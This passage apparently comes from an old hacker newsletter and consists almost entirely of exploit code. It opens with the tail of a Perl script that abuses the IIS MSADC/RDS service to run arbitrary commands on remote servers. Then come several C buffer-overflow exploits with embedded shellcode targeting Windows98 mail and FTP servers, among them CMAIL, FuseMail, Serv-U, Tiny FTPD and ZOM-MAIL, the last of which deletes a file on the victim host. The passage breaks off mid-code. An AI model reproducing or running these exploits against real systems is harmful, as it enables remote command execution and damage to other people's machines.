$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
##############################################################################
sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}
##############################################################################
sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
$args{$switch}="1";}
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
$torun="$p[3]"; $torun=~s/\n//g;
if($torun=~/btcustmr/){
$args{'c'}="1";} # this is a kludge to make it work
if($torun=~/^dbq/){ $torun=$drvst.$torun; }
if(run_query("$torun")){
print "Success!\n";} else { print "failed\n"; }
exit;}
##############################################################################
sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
##############################################################################
sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
##############################################################################
sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
foreach $drive (@drives) {
foreach $dir (@sysdirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv.$drive.":\\".$dir.$mdb)){
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
}}}}}
foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv.$drive.":".$mdb)){
if(run_query($drv.$drive.":".$mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
}}}}
}
##############################################################################
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}
##############################################################################
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}
##############################################################################
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
##############################################################################
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}
##############################################################################
sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("^Server:",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
exit;}
##############################################################################
sub use_unc {
$uncpath=$args{u};
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
if(create_table($driverline.$uncpath)){
if(run_query($driverline.$uncpath)){
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}
##############################################################################
sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}
##############################################################################
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
##############################################################################
@HWA
06.0 CMAIL Server 2.3 SP2 Exploit for Windows98/Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
CMAIL Server 2.3 SP2 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 626
#define JMPADR 622
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF, 0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: aa <%s@aa.com>\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}
@HWA
07.0 FuseMail Version 2.7 Exploit for Windows98/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
FuseMail Version 2.7 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 1159
#define RETADR 1074
#define FTP_PORT 110
#define JMP_ESP 0xbff7a027
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[3000],buf[1500];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
memset(buf,'a',BUFSIZE);
buf[BUFSIZE]=0;
ip=JMP_ESP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"USER %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
memset(packetbuf,0,1024);
sprintf(packetbuf,"PASS sample\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
@HWA
08.0 NetcPlus SmartServer3 Exploit for Windows98/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
NetcPlus SmartServer3 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 1167
#define JMPADR 1163
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[2000]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}
@HWA
09.0 FTP Serv-U Version 2.5 Exploit for Windows98/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
FTP Serv-U Version 2.5 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 9000
#define FTP_PORT 21
#define RETADR 164
#define CODEOFS 200
#define FSTACKOFS 174
#define JMPOFS 6
#define MAXUSER 100
#define MAXPASS 100
#define EIP 0xbff7a027
#define FAKESTACK 0x80050101
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe";
void sendcmd(int sockfd,char *packetbuf)
{
int i;
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
}
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
char user[MAXUSER],pass[MAXPASS];
int sockfd,i,fakestack,ip,ebp,ins;
if (argc<2){
printf("usage\n %s HostName {[username] [password]}\n",argv[0]);
exit(1);
}else if (argc==4){
strncpy(user,argv[2],MAXUSER-1);
strncpy(pass,argv[3],MAXPASS-1);
user[MAXUSER-1]=0; pass[MAXPASS-1]=0;
}else{
strcpy(user,"anonymous");
strcpy(pass,"hoge@hohoho.com");
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
memset(buf,NOP,BUFSIZE);
fakestack=FAKESTACK;
for (i=0;i<FSTACKOFS;i+=4){
buf[i ]=fakestack&0xff;
buf[i+1]=(fakestack>>8)&0xff;
buf[i+2]=(fakestack>>16)&0xff;
buf[i+3]=(fakestack>>24)&0xff;
}
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[RETADR+4]=JMPS;
buf[RETADR+5]=JMPOFS;
memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;
sprintf(packetbuf,"user %s\r\n",user);
sendcmd(sockfd,packetbuf);
sprintf(packetbuf,"pass %s\r\n",pass);
sendcmd(sockfd,packetbuf);
sprintf(packetbuf,"cwd %s\r\n",buf);
sendcmd(sockfd,packetbuf);
close(sockfd);
}
@HWA
10.0 Tiny FTPD Version 0.51 Exploit for Windows98/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
Tiny FTPD Version 0.51 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 1000
#define FTP_PORT 21
#define RETADR 137
#define JMPADR 133
#define CODEOFS 141
#define JMPOFS 6
#define JMP_EBX_ADR 0xbff7a06b
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[3000],buf[1500];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
memset(buf,'a',BUFSIZE);
buf[BUFSIZE]=0;
ip=JMP_EBX_ADR;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR ]=0xeb;
buf[JMPADR+1]=0x06;
strncpy(buf+CODEOFS,exploit_code,strlen(exploit_code));
memset(packetbuf,0,1024);
sprintf(packetbuf,"USER %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
memset(packetbuf,0,1024);
sprintf(packetbuf,"PASS sample\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
@HWA
11.0 ZOM-MAIL 1.09 Exploit/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
ZOM-MAIL 1.09 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#define TARGET_FILE "c:\\windows\\test.txt"
#define MAXBUF 3000
#define RETADR 768
#define JMPESP_ADR 0xbffca4f7
#define STACK_BYTES 32
#define SMTP_PORT 25
#define CONTENT \
"Subject: [Warning!!] This is exploit test mail.\r\n"\
"MIME-Version: 1.0\r\n"\
"Content-Type: multipart/mixed; "\
"boundary=\"U3VuLCAzMSBPY3QgMTk5OSAxODowODo1OCArMDkwMA==\"\r\n"\
"Content-Transfer-Encoding: 7bit\r\n"\
"--U3VuLCAzMSBPY3QgMTk5OSAxODowODo1OCArMDkwMA==\r\n"\
"Content-Type: image/gif; name=\"%s.gif\"\r\n"\
"Content-Disposition: attachment;\r\n"\
" filename=\"temp.gif\"\r\n"
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.remove.";
void send_smtpcmd(SOCKET sock,char *cmd)
{
char reply[MAXBUF];
int r;
send(sock,cmd,strlen(cmd),0);
r=recv(sock,reply,MAXBUF,0);
reply[r]=0;
printf("%-11s: %s\n",strtok(cmd,":"),reply);
}
main(int argc,char *argv[])
{
SOCKET sock;
SOCKADDR_IN addr;
WSADATA wsa;
WORD wVersionRequested;
unsigned int ip,p1,p2;
char buf[MAXBUF],packetbuf[MAXBUF+1000];
struct hostent *hs;
if (argc<3){
printf("This exploit removes \"%s\" on the victim host",TARGET_FILE);
printf("usage: %s SMTPserver Mailaddress\n",argv[0]);
return -1;
}
wVersionRequested = MAKEWORD( 2, 0 );
if (WSAStartup(wVersionRequested , &wsa)!=0){
printf("Winsock Initialization failed.\n"); return -1;
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.\n"); return -1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons((u_short)SMTP_PORT);
if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n"); return -1;
}
addr.sin_family = hs->h_addrtype;
memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
printf("Can not connect to specified host.\n"); return -1;
}
recv(sock,packetbuf,MAXBUF,0);
printf("BANNER : %s\n",packetbuf);
send_smtpcmd(sock,"EHLO mail.attcker-host.net\r\n");
send_smtpcmd(sock,"MAIL FROM: <attacker@attacker-host.net>\r\n");
sprintf(packetbuf,"RCPT TO: <%s>\r\n",argv[2]);
send_smtpcmd(sock,packetbuf);
send_smtpcmd(sock,"DATA\r\n");
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
ip=JMPESP_ADR;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strcat(exploit_code,cmdbuf);
